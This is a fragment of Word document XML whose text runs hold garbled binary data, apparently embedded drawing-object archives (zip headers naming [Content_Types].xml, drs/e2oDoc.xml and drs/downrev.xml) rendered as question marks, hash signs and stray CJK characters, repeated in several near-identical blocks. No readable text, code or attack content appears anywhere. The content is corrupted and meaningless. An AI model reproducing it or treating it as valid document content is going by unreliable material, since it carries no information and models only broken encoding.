        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###########?###"#</w:t>
        <w:br/>
        <w:t>?####$####</w:t>
        <w:br/>
        <w:t>#####?p######?#?#####?#####?#####?#####?#####?#####?#####?#####?#???#?#d###?#####?#####?#####??####?###"##W??wb_ #2#2###3#"??###?# # #???###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#?W'?[###?#######drs/e2oDoc.xml?T???0#?#?#??4mh?l?t??#!-?bA?]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M?#?#8#!qA|#????`?4e#8!r??#????Y??ZM??y#????#i8#e?y?~?##?#L??%????,??[t??94??t#A?/:[?&amp;#[d??l?#??#?#??#?:#?u???,#??Y#NX#\z?????.#~UI#^V????bm!?.???f?#+j?l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?L#Lz?:e??K???j#w?</w:t>
        <w:br/>
        <w:t>##m#U??L=`7??o?\4???#???&amp;??`???#J?4?)1?E?n&gt;^???????7?&gt;#&lt;F?:?#?za?]???3??=1?j???c?k$#X?$???#??P?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>鞃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@?kW?6#"#d?T?:?"w?p&lt;&lt;???G3J8?#?I?T?X1#[??S</w:t>
        <w:tab/>
        <w:t>-?FI#\#?</w:t>
        <w:br/>
        <w:t>?O#????????;J?V??[??d&gt;?#??Y????#?^S?VZ##?</w:t>
        <w:br/>
        <w:t>M?%6??~???#??N????v#3?t??j??Q?&gt;??=#???!???#??#Rie#?^??#'?3-Q??4???J#?!??|?#?#?;e&amp;??\?Z?4=?(?##?#????i?W=</w:t>
        <w:br/>
        <w:t>?#L?mvi????8###W8#??ID?0#n0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*#.?#??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>`?;???&gt;#???</w:t>
        <w:tab/>
        <w:t>##??##PK##########!#[?tK?###</w:t>
        <w:tab/>
        <w:t>#######drs/downrev.xmlL?KO?0#??&amp;??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>暸</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>s</w:t>
        <w:br/>
        <w:t>?#??????#I?#Z##zKhy???????r?w??f#????##?#???#?????&amp;#?D%#?Z???p?./JY(??Q/?`#??/??.??????????n?n?2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\??#&lt;???[?#-tr?#?n??</w:t>
        <w:br/>
        <w:t>x??i?_????xn&gt;??#??j??##?#?`??'u??q3*?#??&gt;&amp;T?m?#F@?e)?F@?????????###??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#?W'?[###?#################.###drs/e2oDoc.xmlPK##-#########!#[?tK?###</w:t>
        <w:tab/>
        <w:t>#################?###drs/downrev.xmlPK##########?###?########?###########?##########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###########?###"#</w:t>
        <w:br/>
        <w:t>?####%####</w:t>
        <w:br/>
        <w:t>#####?p######?#?#####?#####?#####?#####?#####?#####?#####?#####?#???#?#d###?#####?#####?#####??####?###"##W??wb_ #2#3###3#"??###?# # #???###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#L?,`[###?#######drs/e2oDoc.xml?T???0#?#?#??4mv?e??+?#i?##???Nbp&lt;??6?#?#8#!qA|#????`?4e#8!r??#??????ZM??y#????#i8#e?~?z?##?#L??%????-??w??94??t#A?/:[?&amp;#[d??l?#??#?#??#?:#?u???,#?gY#NX#\z??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>罓</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.#~UI#^T????bm!?.??f?9+j?l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?L#Lz?:g???S@??;?P?#?6??R\?#?????n?#fe?#???@???????#%J?#QbX?#?||??ˇ??|?L?#9?/??t?Ko/??????a???????L`e?x??##7#C?{##3?M?D?rm#D"?.?r}PE?#?xxz???L)??:??&lt;???b#??'#Z#??:?#?#?O#????????[J?V??[??d6????Y????#?^S?RZ##?</w:t>
        <w:br/>
        <w:t>M?%6??~???#??N????v#3?t??r??Q?&gt;??=#???!??#??#Rie#?^??q#N&lt;gZ??=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1?6?C#???O#Z#|w?LX#????Diz*Q??F$;0?{#??f?z#?#??[??h?b#q#? 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?"a0?`?#?#?#&gt;T#\b!??#?$w#??}*??_e?###??##PK##########!#cK#4?###</w:t>
        <w:tab/>
        <w:t>#######drs/downrev.xmlL??N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H?Cd$vLZ#???#?Cbv?P?m??????#_?Y?Ζ???-????l??y??n#`##?;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</w:t>
        <w:br/>
        <w:t>??=#</w:t>
        <w:tab/>
        <w:t>_&amp;??&lt;=)T???{3#?e#?!W#?#???д???A?}??H?h?#?B??I"?S#?V</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?5??09</w:t>
        <w:tab/>
        <w:t>o???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>v???vy:?#??.??&lt;?[#?E???#~?I#Jr???:?^?U*#?4?;`#\??#X-!?R?e??7(###??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#L?,`[###?#################.###drs/e2oDoc.xmlPK##-#########!#cK#4?###</w:t>
        <w:tab/>
        <w:t>#################?###drs/downrev.xmlPK##########?###?########?###########?##########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###########?###"#</w:t>
        <w:br/>
        <w:t>?####&amp;####</w:t>
        <w:br/>
        <w:t>#####?p######?#?#####?#####?#####?#####?#####?#####?#####?#####?#???#?#d###?#####?#####?#####??####?###"##W??wb_ #2#4###C#"??###?# # #???###?##?#??#####PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK#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f###?#######drs/e2oDoc.xml?T???0#?#?#??l???+?#i?##???Nbp&lt;?v??#?#???? &gt;??Y?g0v??#'D#???y3?'g?V??t^?)??(?D##B????^.?=??#f#?`dIo??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>系</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>w?:[?14??t#A?/:[?&amp;#[d??l??#+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>:+p-#?uu&amp;#?#???8?Y#NX#\z??#???#~UI#?W????bm!?.??f?3V??F?m#?#?h?2?t#u?##+???j#w?</w:t>
        <w:br/>
        <w:t>G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q?z?nF?o?\7???#???&amp;??`????#J?t|B?a-jt????/#??z??3?c????????.??#??##?Z&gt;t#?F2??????  n&lt;??e?##f`?#??M??#?D?MR?f???#??p???</w:t>
        <w:tab/>
        <w:t>???w&lt;???I??#C?u&gt;&lt;?Вh????#(}J??&gt;$i??&amp;?PR?#?^3MF???~*?#??=`nE##?5q#^??$]b???#|O, #y:??^ε#???#???m???a?m?#???,#{!XS=???#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>佤</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??&gt;?xδD#{??;L%?T??????O#Z?|#e&amp;??\?-Q?f%???d#?tocq?le?J?/&amp;l????c#?#,A??;?p?J??????'&amp;?F?`??X##3?#?[#\?$??H`????r~?df?###??##PK##########!#!~???###</w:t>
        <w:tab/>
        <w:t>#######drs/downrev.xmlL??N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H?Cd$vL:@#*MG??#???#???4N?#?z?</w:t>
        <w:br/>
        <w:t>V????b???z?C#?M#Lc?T?F@??z?#?A???C-?K{??#??[??c0?B??R@#?s?V[?7n?H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??Q.#n{~#E</w:t>
        <w:tab/>
        <w:t>??C???A???9#'+`??o?`7?#???\Vo?Y%?????#,?5???O?P?S?&amp;T??#?(?</w:t>
        <w:tab/>
        <w:t>#p?R% I?#dY</w:t>
        <w:br/>
        <w:t>?,??#?####??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-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f###?#################.###drs/e2oDoc.xmlPK##-#########!#!~???###</w:t>
        <w:tab/>
        <w:t>#################?###drs/downrev.xmlPK##########?###?########?####</w:t>
        <w:tab/>
        <w:t>######?##########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###########?###"#</w:t>
        <w:br/>
        <w:t>?####'####</w:t>
        <w:br/>
        <w:t>#####?p######?#?#####?#####?#####?#####?#####?#####?#####?#####?#???#?#d###?#####?#####?#####??####?###"##W??wb_ #2#5###C#"??###?# # #???###?##?#??#####PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#?g}?d###?#######drs/e2oDoc.xml?T???0#?#?#??l?B##5]?.EH#?X#g?v#??1????#pFB??#&gt;g#???i?#8!r??#???&lt;??m[M6?y#?????#i8#e?z???##?#L??%?IO??o?:[?14??t#A?/:[?&amp;#[d??l??#+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>:+p-#?uu&amp;#?#???8?Y#NX#\z??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>罓</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?#~UI#?W????bm!?.???f?#+j?l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?L#Lz?:g???S@??;?P?##m#U??L=`7???n?#fe?#???@???????#%J:?PbX?#]|??ˇ?^?L?#9?/??t?Ko/??????a??#????L`e?x?;</w:t>
        <w:br/>
        <w:t>?#??d?=#?#?:@?k[?6#"#d?T?#T??@8#???t:A?8??'?q?-c?#m?#?%?$#%u?6?#J?R??#I#??7?T?F?7L??t:???f??2b#?{Q?RiM#??*4I??ir?#?##H@????W#?#f(?#??b???}X#????!??#??#Rie#?^??&gt;?xδD#{??;L%?T????#?2n=hu?#???#r??%J?D?##?????m,N???Q??ń?j???G|#+#;|###\I??5s?#??$?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??`?7?s?K?D0#</w:t>
        <w:tab/>
        <w:t>Ly4s7???_???O###??##PK##########!#o?d??###</w:t>
        <w:tab/>
        <w:t>#######drs/downrev.xmlL?MO?0#??&amp;??fL??ew##?l?#????k?#??SBˇ?zǔ????;????b??w?#l7##???##???M</w:t>
        <w:br/>
        <w:t>?#MF??P?#z8#?#??[??)4?C?gZA#?I??#??#7 ???V#n?F?Q/#n{???XZ?#_h??#-???d#?M?wSS7?#???\}?/?i????z#"?#?`??gu(?r##/z#?.?eT?&gt;?` Mc#T\${?E.?P?###??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#?g}?d###?#################.###drs/e2oDoc.xmlPK##-#########!#o?d??###</w:t>
        <w:tab/>
        <w:t>#################?###drs/downrev.xmlPK##########?###?########?###########?##########</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?###########??###B#</w:t>
        <w:br/>
        <w:t>?####(####</w:t>
        <w:br/>
        <w:t>##?##?T######?######?#####?#####?#?o##?#####?#####??####?#{?##?#{?##?###"#?v?c??c&amp;{ #2#6###3#"?]###?###@#??K###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#?????###?#######drs/e2oDoc.xml?S??0#?#?#??4i?]J?t#[-?#T??#f#'??&lt;?i_?#@?#'??y#v#???vY?!r#y?&gt;??y???#?v2?r???Y???5?v5w{?b?#F?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>hge?##???????+?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,V??y#???#E/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??yi)?` ?#??</w:t>
        <w:tab/>
        <w:t>0#???,????#'$"E7c??3~?J#?-??t?i??m??.?b???#?{%?1?#?0?,]z??@#?!????#??k?L8S??UBf#?f^???#/3###?I&amp;????n#?jj?8???7??????/#?&gt;?????Q?d#&lt;VT}i?!##{{?x??+?$??~,???rb??Y??Iv??L?AA???|??,]U@u??#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ke? P??#?Xz,Ia??#?J[6#??#a2#?[??HG?-?3?#-??!C??I?##x?#?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?[?[#?3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#)A#?7M??5?#??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>朚</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?M?2??4??V?t??6##?'?ZL?v?w????#?###??##PK##########!#mq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??###########drs/downrev.xmlL?AO?0#??&amp;???x1nq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#"????x#1^#}#???????????Lf???#?f7XF?YE ?[?#?#???#??#-#?#9?#?g??=?##*?P?.S#??S&amp;?k{2??D#?#;#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>僜</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>;?g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?(?H?###??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>豧</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>???##.?I?v??U]??rWW?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????p#??????#С#L??vbDH?8#Q?d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>"???A??#?E.?#(?###??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#?????###?#################.###drs/e2oDoc.xmlPK##-#########!#mq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#####################9###drs/downrev.xmlPK##########?###B########?###########?###########??###B#</w:t>
        <w:br/>
        <w:t>?####)####</w:t>
        <w:br/>
        <w:t>##?##?T######?######?#####?#####?#?o##?#####?#####??####?#?????#?????###"#?v?c??c&amp;{ #2#8###S#"?h###?###@#??J###?##?#??#####?#####PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#?I?h?###?#######drs/e2oDoc.xml?SK?#1#?#q#?{??#j?3????#"?p?#??m?\&amp;?\?# ??#K???cPv&gt;?g??E??z???zq???mdD?]???3???[?????#?0???x'[?????-???#??dd#?#Cˇ?BSU(#i#'&gt;HGA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>壅</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>D??W]??Э?fu??#}?B?B"??j#????#?R(#3-??R???l??#?&gt;B#?8?#??#???#?</w:t>
        <w:br/>
        <w:t>#?OQ???ZD?^????Ji!##b3?#??# ????p?</w:t>
        <w:tab/>
        <w:t>?#?x?YG????hR#,??????????J???wF#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?[?LTl?U???#R?z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6?#S?-??N??mb?.????z6?L#c#4??#1?????h?#?#6?????#S??#?2U??i?_gh??R##?6#]t=g`z?Z?b?Dot??3#???D?#Z#????/g#0Q?H?/+C-&lt;(???#?}q</w:t>
        <w:tab/>
        <w:t>#??в????be??w?u&lt;*J3/???Ku?L???h?###??##PK##########!#?0???###########drs/downrev.xmlL?AO?@#??&amp;???3?b?F)"K#&amp;&amp;??#?#&lt;?????#??}?????d??6?#?#?#,)X-##H?m#?#To/?#?#?Z=ZB#??a?_^d:m?^?P?N?#?T+?C?R)}??~i'$?&gt;?3:?u?l?&gt;?#?m#??????#&gt;??|?{??</w:t>
        <w:br/>
        <w:t>?????}?T??a]??#+u}5?=?#8??2??##rf??Z/F#?x?M#?;##'?=????&lt;????####??##PK##-#########!#??8??###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################/###_rels/.relsPK##-#########!#?I?h?###?#################.###drs/e2oDoc.xmlPK##-#########!#?0???#####################9###drs/downrev.xmlPK##########?###A########?###########?###########??###B#</w:t>
        <w:br/>
        <w:t>?####*####</w:t>
        <w:br/>
        <w:t>##?##?T######?######?#####?#####?#?o##?#####?#####??####?#{?##?#{?##?###"#?v?c??c&amp;{ #2#7###3#"?\###?###@#??J###?##?#?PK##########!#??8??###?#######[Content_Types].xml??AN?0#E?H???#%N?@#%</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>邴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>K@?#`dO#?dlyLho???#D?X?3??'??#?AL#?:??*/?@??X?*???e#Rp#208?J#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>妾</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?)?G?,R???}??Q)?=????Hi?0BL??)#?#:T?W?QD?Y?;d]6???#????O&amp;##???8?*</w:t>
        <w:tab/>
        <w:t>?#VCL?j"??</w:t>
        <w:tab/>
        <w:t>yJ.;?[?wIC?_</w:t>
        <w:tab/>
        <w:t>??:?{IO#?A?</w:t>
        <w:br/>
        <w:t>!&gt;?4?</w:t>
        <w:tab/>
        <w:t>?p?#??;fɑ3?Vc?#?.???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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#????###?#######drs/e2oDoc.xml?S??0#?#?#??4i?eK?t#[-?#T??#f#'??&lt;?i_?#@?#'??y#v#???vY?!r#y?&gt;??y???#?v2?r???Y???5?v5w{?b?#F?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>hge?##???????+?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,V??y#???#E/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??yi)?` ?#??</w:t>
        <w:tab/>
        <w:t>0#???,_#?#?#NHD?n?$_g???"?m[????l1??]??z#U#??JLc??La@Y??#??#?CPA#%?C??p?pm???#?????M#^f.$#??L??`??60??|qΙ#Cot????_#~|&amp;{??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x????nC"*???_;?#)W&lt;I&amp;#?X?o?I?????r#?#????e???,]U@u??#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ke? P??#?Xz,Ia??#?J[6#??#a2#?[??HG?-?3?#-??!C??I?##x?#?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?[?[#?3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#)A#?7M??5?#??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>朚</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?M?2??4??V?t??6##?'?ZL?v?w????#?###??##PK##########!#</w:t>
        <w:br/>
        <w:t>?7??###########drs/downrev.xmlL??N?0#D?H???H\P?PhSB6#AB?J???#/ID?Nc?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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?f?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>楛</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>???H??,#??##??#7#??e?#?b?z??E#6??E?#mO?F??7"@?%</w:t>
        <w:br/>
